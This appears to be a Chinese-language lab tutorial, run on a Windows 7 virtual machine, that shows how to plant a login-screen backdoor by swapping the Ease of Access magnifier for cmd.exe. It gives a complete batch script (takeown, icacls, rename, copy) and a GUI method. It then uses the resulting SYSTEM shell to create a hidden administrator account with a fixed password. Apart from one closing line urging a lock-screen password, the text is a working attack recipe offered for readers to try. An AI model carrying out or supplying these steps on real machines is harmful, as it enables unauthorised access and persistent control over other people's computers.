利用 “轻松访问” 轻松创建Windows后门

1. 实验概述

（1）实验环境：

win7虚拟机；

（2）实验描述：

打开win7虚拟机就可以看到左下角有个轻松访问的标志 ，这里面有六个应用，分别是讲述人，放大镜，高对比度，屏幕键盘，粘滞键，筛选键。这六个应用在不用登录电脑账号和密码的情况下就可以直接使用。这个设计是为了让计算机更方便使用。但是在方便使用的时候，也容易被别人留个后门；如果说这六个应用中的一个被别人暗中替换掉了，那就可以实现在不知道账户和密码的情况下，对电脑进行相应的操作。在本次实验中，将给大家简单介绍一下怎么利用“轻松访问”轻松的创建Windows后门；

（3）实验原理：

利用win7登录账户界面中的 “轻松访问” 中的 程序 （本次实验是放大镜）,把它替换为cmd.exe程序,实现在不登录的情况下打开cmd命令提示符（系统管理员权限）,并进行一些操作，在计算机上留个后门。

2. 实验过程

方式一：命令行的模式（脚本）写后门

（1）登录账户之前，有个轻松访问，左下角标识

（2）我们的实验就是通过这里的轻松访问设置后门（本次实验是在放大镜上设置后门（将放大镜——>变为cmd命令行））；

（3）打开记事本，输入如下的命令（蓝色字体）：

切换目录到c:\windows\system32；

cd c:\windows\system32

更改文件名为magnify.exe的所有者为当前用户；

takeown /f magnify.exe

将当前用户所在的组（管理员组）赋予完全访问权限；

icacls magnify.exe /grant administrators:F

将可执行文件magnify.exe更名为magnify_back.exe；

ren magnify.exe magnify_back.exe

将cmd.exe复制并更名为magnify.exe；

copy cmd.exe magnify.exe

（4）保存写好的记事本文件为back.bat,并且保存文件的类型为所有文件。

（5）这时候，就可以看到保存好的back.bat文件了。

（6）打开刚刚建立的文件back.bat，点击鼠标右键---->以管理员身份运行--à出现如下类似的窗口（我这是加入了域，如果没有加域的话，直接点击是就可以了，加域的话需要输入用户名和密码）

（7）之后屏幕会闪烁一下，就说明这个后门已经搞好了，接下来，就是测试一下这个后门是否能够成功。

（8）重新启动电脑，可以看到如下界面，可以看到左下角的那个标识——轻松访问。

（9）点击左下角标识，我们可以看到如下界面呈现的页面，因为我们的后门是对放大镜程序做了更改，将放大镜直接更改为以管理员运行的cmd命令操作行，所以，我们点击放大镜，就可以直接进入cmd。

（10）系统在没有输入用户名和密码的情况下，弹出了cmd命令行界面，而且是system权限。

（11）接下来，我们就可以通过这个命令行界面去创建账户，输入如下的命令；

创建一个新的账户：账户名为newuser，密码为：123.com；

net user newuser 123.com /add

将新创建的用户newuser加入到管理员组中；赋予管理员的权限

net localgroup administrators /add newuser

通过创建的账户名和密码，我们以后登录电脑就可以采用我们创建的账户登录。不需要知道原来的账户和密码。

（12）关闭这个窗口，尝试登录系统，就可以成功登录进去了（注意：因为我的电脑加入了域，所有需要输入前面的主机名，如果没有加域的话，就只需要输入newuser即可）

方式二：图像化的方式创建后门

（1）进入c:\windows\system32,找到mangify.exe,将他更名为：mangify_back.exe，此时发现无法更名，需要我们去更改权限。

（2）点击mangify.exe右键-- 安全--高级--所有者---将所有者改为本机登录的账户

（3）由于本机登录的账户是普通用户，所有我们更改普通用户的权限，将其改为完全控制

（4）查看users的权限，可以看到权限是 完全控制。

（5）然后我们将mangify.exe,将他更名为：mangify_back.exe，然后将cmd.exe复制一份并改名为mangify.exe，让系统将cmd.exe认为是mangify.exe。

（6）（如上）重新启动电脑，可以看到如下界面，可以看到左下角的那个标识。

（7）点击左下角标识，我们可以看到如下界面呈现的页面，因为我们的后门是对放大镜程序做了更改，将放大镜直接更改为以管理员运行的cmd命令操作行，所以，我们点击放大镜，就可以直接进入cmd。

（8）系统在没有输入用户名和密码的情况下，弹出了cmd命令行界面，而且是system权限。

（9）接下来，我们就可以通过这个命令行界面去创建账户，输入如下的命令；

创建一个新的账户：账户名为newuser，密码为：123.com；

net user newuser 123.com /add

将新创建的用户newuser加入到管理员组中；赋予管理员的权限

net localgroup administrators /add newuser

通过创建的账户名和密码，我们以后登录电脑就可以采用我们创建的账户登录。不需要知道原来的账户和密码。

（10）关闭这个窗口，尝试登录系统，就可以成功登录进去了（注意：因为我的电脑加入了域，所有需要输入前面的主机名，如果没有加域的话，就只需要输入newuser即可）

是不是很简单呢，大家可以进行尝试操作，还有就是，给自己的电脑增加锁屏密码很有必要，以防不注意被别人在电脑上留个后门。